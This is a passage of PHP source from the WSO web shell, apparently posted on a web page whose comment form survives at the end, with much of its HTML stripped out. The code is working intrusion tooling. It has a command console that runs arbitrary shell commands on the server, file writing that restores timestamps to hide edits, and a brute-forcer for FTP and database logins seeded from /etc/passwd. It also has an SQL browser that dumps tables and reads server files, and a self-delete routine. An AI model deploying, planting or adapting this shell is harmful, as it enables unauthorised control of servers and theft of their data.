if( !is_writable($_POST[\'p1\'])) {
echo \'File isn\\\'t writeable\';
break;
}
if( !empty($_POST[\'p3\']) ) {
$time = @filemtime($_POST[\'p1\']);
$_POST[\'p3\'] = substr($_POST[\'p3\'],1);
$fp = @fopen($_POST[\'p1\'],\"w\");
if($fp) {
@fwrite($fp,$_POST[\'p3\']);
@fclose($fp);
echo \'Saved!

\';
@touch($_POST[\'p1\'],$time,$time);
}
}
echo \'

>\">

\';
break;
case \'hexdump\':
$c = @file_get_contents($_POST[\'p1\']);
$n = 0;
$h = array(\'00000000
\',\'\',\'\');
$len = strlen($c);
for ($i=0; $i<$len; ++$i) {
$h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';
switch ( ord($c[$i]) ) {
case 0: $h[2] .= \' \'; break;
case 9: $h[2] .= \' \'; break;
case 10: $h[2] .= \' \'; break;
case 13: $h[2] .= \' \'; break;
default: $h[2] .= $c[$i]; break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'
\';}
$h[1] .= \'
\';
$h[2] .= \"\\n\";
}
}
echo \'

\'.$h[0].\'

\'.$h[1].\'
\'.htmlspecialchars($h[2]).\'

\';
break;
case \'rename\':
if( !empty($_POST[\'p3\']) ) {
if(!@rename($_POST[\'p1\'], $_POST[\'p3\']))
echo \'Can\\\'t rename!
\';
else
die(\'

\');
}
echo \'

>\">

\';
break;
case \'touch\':
if( !empty($_POST[\'p3\']) ) {
$time = strtotime($_POST[\'p3\']);
if($time) {
if(!touch($_POST[\'p1\'],$time,$time))
echo \'Fail!\';
else
echo \'Touched!\';
} else echo \'Bad time format!\';
}
clearstatcache();
echo \'

>\">

\';
break;
}
echo \'

\';
wsoFooter();
}

function actionConsole() {
if(!empty($_POST[\'p1\']) && !empty($_POST[\'p2\'])) {
WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', true);
$_POST[\'p1\'] .= \' 2>&1\';
} elseif(!empty($_POST[\'p1\']))
WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', 0);

if(isset($_POST[\'ajax\'])) {
WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);
ob_start();
echo \"d.cf.cmd.value=\'\';\\n\";
$temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes(\"\\n$ \".$_POST[\'p1\'].\"\\n\".wsoEx($_POST[\'p1\']),\"\\n\\r\\t\\\\\'\\0\"));
if(preg_match(\"!.*cd\\s+([^;]+)$!\",$_POST[\'p1\'],$match)) {
if(@chdir($match[1])) {
$GLOBALS[\'cwd\'] = @getcwd();
echo \"c_=\'\".$GLOBALS[\'cwd\'].\"\';\";
}
}
echo \"d.cf.output.value+=\'\".$temp.\"\';\";
echo \"d.cf.output.scrollTop = d.cf.output.scrollHeight;\";
$temp = ob_get_clean();
echo strlen($temp), \"\\n\", $temp;
exit;
}
if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))
WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);
wsoHeader();
echo \"

\";
echo \'

Console

echo \'

>\"> send using AJAX redirect stderr to stdout (2>&1)

$

\';
echo \'

\';
wsoFooter();
}

function actionLogout() {
setcookie(md5($_SERVER[\'HTTP_HOST\']), \'\', time() - 3600);
die(\'bye!\');
}

function actionSelfRemove() {

if($_POST[\'p1\'] == \'yes\')
if(@unlink(preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__)))
die(\'Shell has been removed\');
else
echo \'unlink error!\';
if($_POST[\'p1\'] != \'yes\')
wsoHeader();
echo \'

Suicide

Really want to remove the shell?
Yes

\';
wsoFooter();
}

function actionBruteforce() {
wsoHeader();
if( isset($_POST[\'proto\']) ) {
echo \'

Results

Type: \'.htmlspecialchars($_POST[\'proto\']).\' Server: \'.htmlspecialchars($_POST[\'server\']).\'
\';
if( $_POST[\'proto\'] == \'ftp\' ) {
function wsoBruteForce($ip,$port,$login,$pass) {
$fp = @ftp_connect($ip, $port?$port:21);
if(!$fp) return false;
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
} elseif( $_POST[\'proto\'] == \'mysql\' ) {
function wsoBruteForce($ip,$port,$login,$pass) {
$res = @mysql_connect($ip.\':\'.$port?$port:3306, $login, $pass);
@mysql_close($res);
return $res;
}
} elseif( $_POST[\'proto\'] == \'pgsql\' ) {
function wsoBruteForce($ip,$port,$login,$pass) {
$str = \"host=\'\".$ip.\"\' port=\'\".$port.\"\' user=\'\".$login.\"\' password=\'\".$pass.\"\' dbname=postgres\";
$res = @pg_connect($str);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(\":\", $_POST[\'server\']);
if($_POST[\'type\'] == 1) {
$temp = @file(\'/etc/passwd\');
if( is_array($temp) )
foreach($temp as $line) {
$line = explode(\":\", $line);
++$attempts;
if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
$success++;
echo \'\'.htmlspecialchars($line[0]).\':\'.htmlspecialchars($line[0]).\'
\';
}
if(@$_POST[\'reverse\']) {
$tmp = \"\";
for($i=strlen($line[0])-1; $i>=0; --$i)
$tmp .= $line[0][$i];
++$attempts;
if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
$success++;
echo \'\'.htmlspecialchars($line[0]).\':\'.htmlspecialchars($tmp);
}
}
}
} elseif($_POST[\'type\'] == 2) {
$temp = @file($_POST[\'dict\']);
if( is_array($temp) )
foreach($temp as $line) {
$line = trim($line);
++$attempts;
if( wsoBruteForce($server[0],@$server[1], $_POST[\'login\'], $line) ) {
$success++;
echo \'\'.htmlspecialchars($_POST[\'login\']).\':\'.htmlspecialchars($line).\'
\';
}
}
}
echo \"Attempts: $attempts Success: $success


\";
}
echo \'

Bruteforce

\'
.\'

\'
.\'

\'
.\'

\'
.\'

\'
.\'

\'
.\'

\'
.\'

Type
\'
.\'\'
.\'\'
.\'\'
.\'Server:port
Brute type

\'
.\'

\'
.\'

\'
.\'

Login
Dictionary

\'
.\'

>\">

\';
echo \'


\';
wsoFooter();
}

function actionSql() {
class DbClass {
var $type;
var $link;
var $res;
function DbClass($type) {
$this->type = $type;
}
function connect($host, $user, $pass, $dbname){
switch($this->type) {
case \'mysql\':
if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
break;
case \'pgsql\':
$host = explode(\':\', $host);
if(!$host[1]) $host[1]=5432;
if( $this->link = @pg_connect(\"host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname\") ) return true;
break;
}
return false;
}
function selectdb($db) {
switch($this->type) {
case \'mysql\':
if (@mysql_select_db($db))return true;
break;
}
return false;
}
function query($str) {
switch($this->type) {
case \'mysql\':
return $this->res = @mysql_query($str);
break;
case \'pgsql\':
return $this->res = @pg_query($this->link,$str);
break;
}
return false;
}
function fetch() {
$res = func_num_args()?func_get_arg(0):$this->res;
switch($this->type) {
case \'mysql\':
return @mysql_fetch_assoc($res);
break;
case \'pgsql\':
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs() {
switch($this->type) {
case \'mysql\':
return $this->query(\"SHOW databases\");
break;
case \'pgsql\':
return $this->res = $this->query(\"SELECT datname FROM pg_database WHERE datistemplate!=\'t\'\");
break;
}
return false;
}
function listTables() {
switch($this->type) {
case \'mysql\':
return $this->res = $this->query(\'SHOW TABLES\');
break;
case \'pgsql\':
return $this->res = $this->query(\"select table_name from information_schema.tables where table_schema != \'information_schema\' AND table_schema != \'pg_catalog\'\");
break;
}
return false;
}
function error() {
switch($this->type) {
case \'mysql\':
return @mysql_error();
break;
case \'pgsql\':
return @pg_last_error();
break;
}
return false;
}
function setCharset($str) {
switch($this->type) {
case \'mysql\':
if(function_exists(\'mysql_set_charset\'))
return @mysql_set_charset($str, $this->link);
else
$this->query(\'SET CHARSET \'.$str);
break;
case \'pgsql\':
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function loadFile($str) {
switch($this->type) {
case \'mysql\':
return $this->fetch($this->query(\"SELECT LOAD_FILE(\'\".addslashes($str).\"\') as file\"));
break;
case \'pgsql\':
$this->query(\"CREATE TABLE wso2(file text);COPY wso2 FROM \'\".addslashes($str).\"\';select file from wso2;\");
$r=array();
while($i=$this->fetch())
$r[] = $i[\'file\'];
$this->query(\'drop table wso2\');
return array(\'file\'=>implode(\"\\n\",$r));
break;
}
return false;
}
function dump($table, $fp = false) {
switch($this->type) {
case \'mysql\':
$res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');
$create = mysql_fetch_array($res);
$sql = $create[1].\";\\n\";
if($fp) fwrite($fp, $sql); else echo($sql);
$this->query(\'SELECT * FROM `\'.$table.\'`\');
$i = 0;
$head = true;
while($item = $this->fetch()) {
$sql = \'\';
if($i % 1000 == 0) {
$head = true;
$sql = \";\\n\\n\";
}

$columns = array();
foreach($item as $k=>$v) {
if($v === null)
$item[$k] = \"NULL\";
elseif(is_int($v))
$item[$k] = $v;
else
$item[$k] = \"\'\".@mysql_real_escape_string($v).\"\'\";
$columns[] = \"`\".$k.\"`\";
}
if($head) {
$sql .= \'INSERT INTO `\'.$table.\'` (\'.implode(\", \", $columns).\") VALUES \\n\\t(\".implode(\", \", $item).\')\';
$head = false;
} else
$sql .= \"\\n\\t,(\".implode(\", \", $item).\')\';
if($fp) fwrite($fp, $sql); else echo($sql);
$i++;
}
if(!$head)
if($fp) fwrite($fp, \";\\n\\n\"); else echo(\";\\n\\n\");
break;
case \'pgsql\':
$this->query(\'SELECT * FROM \'.$table);
while($item = $this->fetch()) {
$columns = array();
foreach($item as $k=>$v) {
$item[$k] = \"\'\".addslashes($v).\"\'\";
$columns[] = $k;
}
$sql = \'INSERT INTO \'.$table.\' (\'.implode(\", \", $columns).\') VALUES (\'.implode(\", \", $item).\');\'.\"\\n\";
if($fp) fwrite($fp, $sql); else echo($sql);
}
break;
}
return false;
}
};
$db = new DbClass($_POST[\'type\']);
if(@$_POST[\'p2\']==\'download\') {
$db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);
$db->selectdb($_POST[\'sql_base\']);
switch($_POST[\'charset\']) {
case \"Windows-1251\": $db->setCharset(\'cp1251\'); break;
case \"UTF-8\": $db->setCharset(\'utf8\'); break;
case \"KOI8-R\": $db->setCharset(\'koi8r\'); break;
case \"KOI8-U\": $db->setCharset(\'koi8u\'); break;
case \"cp866\": $db->setCharset(\'cp866\'); break;
}
if(empty($_POST[\'file\'])) {
ob_start(\"ob_gzhandler\", 4096);
header(\"Content-Disposition: attachment; filename=dump.sql\");
header(\"Content-Type: text/plain\");
foreach($_POST[\'tbl\'] as $v)
$db->dump($v);
exit;
} elseif($fp = @fopen($_POST[\'file\'], \'w\')) {
foreach($_POST[\'tbl\'] as $v)
$db->dump($v, $fp);
fclose($fp);
unset($_POST[\'p2\']);
} else
die(\'

\');
}
wsoHeader();
echo \"

Sql browser

Type Host Login Password Database

\";
$tmp = \"\";
if(isset($_POST[\'sql_host\'])){
if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) {
switch($_POST[\'charset\']) {
case \"Windows-1251\": $db->setCharset(\'cp1251\'); break;
case \"UTF-8\": $db->setCharset(\'utf8\'); break;
case \"KOI8-R\": $db->setCharset(\'koi8r\'); break;
case \"KOI8-U\": $db->setCharset(\'koi8u\'); break;
case \"cp866\": $db->setCharset(\'cp866\'); break;
}
$db->listDbs();
echo \"

\';
}
else echo $tmp;
}else
echo $tmp;
echo \"

>\' onclick=\'fs(d.sf);\'> count the number of rows

\";
if(isset($db) && $db->link){
echo \"

\";
if(!empty($_POST[\'sql_base\'])){
$db->selectdb($_POST[\'sql_base\']);
echo \"
Tables:

\";
$tbls_res = $db->listTables();
while($item = $db->fetch($tbls_res)) {
list($key, $value) = each($item);
if(!empty($_POST[\'sql_count\']))
$n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));
$value = htmlspecialchars($value);
echo \" \".$value.\"\" . (empty($_POST[\'sql_count\'])?\' \':\" ({$n[\'n\']})\") . \"
\";
}
echo \"
File path:
\";
if(@$_POST[\'p1\'] == \'select\') {
$_POST[\'p1\'] = \'query\';
$_POST[\'p3\'] = $_POST[\'p3\']?$_POST[\'p3\']:1;
$db->query(\'SELECT COUNT(*) as n FROM \' . $_POST[\'p2\']);
$num = $db->fetch();
$pages = ceil($num[\'n\'] / 30);
echo \"

\".$_POST[\'p2\'].\" ({$num[\'n\']} records) Page # \";
echo \" of $pages\";
if($_POST[\'p3\'] > 1)
echo \" < Prev\";
if($_POST[\'p3\'] < $pages)
echo \" Next




Share on:
0 comments

Post new comment

The content of this field is kept private and will not be shown publicly.
Image CAPTCHA
Enter the characters shown in the image.